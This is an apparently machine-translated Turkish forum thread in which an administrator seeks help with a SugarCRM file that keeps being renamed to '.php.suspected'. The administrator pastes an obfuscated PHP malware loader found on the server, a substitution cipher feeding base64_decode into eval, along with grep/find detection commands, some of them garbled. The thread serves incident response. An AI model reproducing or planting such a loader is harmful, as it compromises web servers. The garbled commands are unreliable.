Son 4 gündür, Üretim sunucumuzda (AWS EC2 örneği) SugarCRM olan tek bir siteye özgü garip bir sorunla karşı karşıyayız.php dosyası otomatik olarak php.suspected olarak yeniden adlandırıldı
Sayı /home/site_folder/public_html/include/MassUpdate.php dosya otomatik yeniden adlandırıldı olan bu 2-3 olur
/home/site_folder/public_html/include/MassUpdate.php.suspected 3-4 saat arayla bir günde zaman. Bu sorun, yalnızca belirli bir site durumunda ortaya çıkar, hatta aynı sitenin çoğaltma kopyası için bile oluşmaz. Hatta bu dosyanın kodunu her iki siteden de kontrol ettim, aynı.
Googled ve bulduk, bu sorun çoğunlukla Wordpress siteleri için oluşur ve saldırı nedeniyle olabilir. Ama sunucumuzu saldırıya karşı kontrol ettik, hiç yok. Ayrıca sunucuda çalışan herhangi bir virüs/kötü amaçlı yazılım taraması yoktur.
Ne yapmalıyız?
Güncelleme: Biz egrep -Rl 'function.*for.*strlen.*isset' /home/username/public_html/
idam Ve örnek kodu aşağıdaki ile birkaç dosyaları olduğunu bulduk bu link geçmekte sonra birkaç şey buldum.
<?php
function flnftovr($hkbfqecms, $bezzmczom){$ggy = ''; for($i=0; $i < strlen($hkbfqecms); $i++){$ggy .= isset($bezzmczom[$hkbfqecms[$i]]) ? $bezzmczom[$hkbfqecms[$i]] : $hkbfqecms[$i];}
$ixo="base64_decode";return $ixo($ggy);}
$s = 'DMtncCPWxODe8uC3hgP3OuEKx3hjR5dCy56kT6kmcJdkOBqtSZ91NMP1OuC3hgP3h3hjRamkT6kmcJdkOBqtSZ91NJV'.
'0OuC0xJqvSMtKNtPXcJvt8369GZpsZpQWxOlzSMtrxCPjcJvkSZ96byjbZgtgbMtWhuCXbZlzHXCoCpCob'.'zxJd7Nultb4qthgtfNMtixo9phgCWbopsZ1X=';
$koicev = Array('1'=>'n', '0'=>'4', '3'=>'y', '2'=>'8', '5'=>'E', '4'=>'H', '7'=>'j', '6'=>'w', '9'=>'g', '8'=>'J', 'A'=>'Y', 'C'=>'V', 'B'=>'3', 'E'=>'x', 'D'=>'Q', 'G'=>'M', 'F'=>'i', 'I'=>'P', 'H'=>'U', 'K'=>'v', 'J'=>'W', 'M'=>'G', 'L'=>'L', 'O'=>'X', 'N'=>'b', 'Q'=>'B', 'P'=>'9', 'S'=>'d', 'R'=>'I', 'U'=>'r', 'T'=>'O', 'W'=>'z', 'V'=>'F', 'Y'=>'q', 'X'=>'0', 'Z'=>'C', 'a'=>'D', 'c'=>'a', 'b'=>'K', 'e'=>'o', 'd'=>'5', 'g'=>'m', 'f'=>'h', 'i'=>'6', 'h'=>'c', 'k'=>'p', 'j'=>'s', 'm'=>'A', 'l'=>'R', 'o'=>'S', 'n'=>'u', 'q'=>'N', 'p'=>'k', 's'=>'7', 'r'=>'t', 'u'=>'2', 't'=>'l', 'w'=>'e', 'v'=>'1', 'y'=>'T', 'x'=>'Z', 'z'=>'f');
eval(flnftovr($s, $koicev));?>
Bazı kötü amaçlı yazılımlar gibi görünüyor, kalıcı olarak kaldırmaya nasıl gidiyoruz?
Teşekkür
Bunu yapan bazı cron işlevleri var olabilir. –
Hayır, böyle bir cron çalışmıyor. –
Bu bir yapım uygulaması içinse, hemen bir güvenlik uzmanıyla görüşmenizi öneririz. Adını değiştirmeden hemen önce bu dosyaya herhangi bir garip istekleri görmek için web sunucusu günlüklerinizi kontrol edebilir misiniz? Bunu CLI 'find'tan çalıştırmayı deneyebilir misiniz? -name "* .php" -exec grep -H "eval (public_html/level'den" {} \; ". Bu," status "olarak adlandırılan bir hacker tarafından yaratılmış olabilecek tüm php dosyalarını arayacaktır. Bu yanlış bir pozitif bulabilirim –